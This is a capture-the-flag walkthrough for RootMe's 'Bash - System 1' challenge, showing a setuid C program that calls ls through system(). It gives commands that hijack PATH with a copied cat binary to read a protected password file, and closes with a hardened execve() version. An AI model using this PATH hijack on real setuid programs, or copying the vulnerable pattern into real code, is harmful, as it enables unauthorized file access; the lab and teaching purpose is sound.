
Understanding the RootMe Challenge

cybersecurity, privilege escalation, command manipulation, SSH, RootMe

This guide walks you through the "Bash - System 1" challenge on RootMe. The challenge involves a short C program, reached over an SSH connection, and the goal is to understand why it is exploitable and then solve it.

Key Points

  • SSH Connection: Connect to the challenge server using SSH.
  • Script Analysis: Understand the provided C program and its implications.
  • Privilege Escalation: Leverage the script to gain unauthorized access.
  • Command Manipulation: Trick the system into running a different command.

Connecting to the Challenge Server

To begin, connect to the challenge server using SSH:

ssh -p 2222 app-script-ch11@challenge02.root-me.org

Analyzing the Script

The provided C source is as follows:

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /challenge/app-script/ch11/.passwd");
    return 0;
}

Breakdown of the Script

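  • setreuid(geteuid(), geteuid()): Sets both the real and effective user IDs of the calling process to its current effective UID. On a setuid binary that effective UID is the file owner's, so everything the program starts afterwards runs with the privileges of the file owner.
  • system(): Hands the command string to a shell (/bin/sh -c), which runs ls on the .passwd file in the specified directory. ls is named without an absolute path, so the shell finds it by searching the directories listed in the PATH environment variable.

The program therefore runs whatever the shell resolves as ls with the privileges of whoever owns the file, while PATH is inherited from the user who launches it.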

Solving the Challenge

To solve the challenge, you need to trick the program into running the cat command instead of ls. Here are the steps:

  1. Locate the ls Command:
    • Find the path of the ls command using which ls.

  2. Create a New ls Command:
    • Create a new ls command in a directory that comes before /bin in the PATH environment variable.
    • Copy the cat binary to this new ls command path.

  3. Run the Script:
    • Execute the script in the home directory to solve the challenge.

Example Commands

# Locate the ls command
which ls

# Create a new ls command
mkdir ~/bin
cp /bin/cat ~/bin/ls

# Ensure the new ls command is prioritized
export PATH=~/bin:$PATH

# Run the script
./ch11
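
For comparison, a hardened variant of the challenge program, added here as an example and not part of the challenge or of the original guide. It runs ls by absolute path through execve() with a fixed environment, so the caller's PATH is never consulted and no shell is involved. The helper name run_ls_fixed and the /bin/ls location are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper (not from the challenge): run ls on `target`
 * without letting the caller's environment choose the binary. */
int run_ls_fixed(const char *target)
{
    /* Absolute path: no PATH lookup, unlike system("ls ..."). */
    static const char ls_path[] = "/bin/ls";   /* assumed location */
    /* Fixed environment: nothing is inherited from the caller
     * (PATH, IFS, LD_* and similar variables are all dropped). */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    /* "--" ends option parsing so `target` is always a file name. */
    char *const argv[] = { "ls", "--", (char *)target, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(ls_path, argv, envp);   /* direct exec, no /bin/sh */
        _exit(127);                    /* reached only if exec failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    /* Return ls's exit code, or -1 if it was killed by a signal. */
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Same privilege handling as the original program, with the
     * return value checked. */
    if (setreuid(geteuid(), geteuid()) != 0) {
        perror("setreuid");
        return 1;
    }
    return run_ls_fixed("/challenge/app-script/ch11/.passwd");
}
```

With this version, prepending a directory to PATH has no effect on which binary runs, because execve() is given the full path and the child's environment is built by the program itself.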
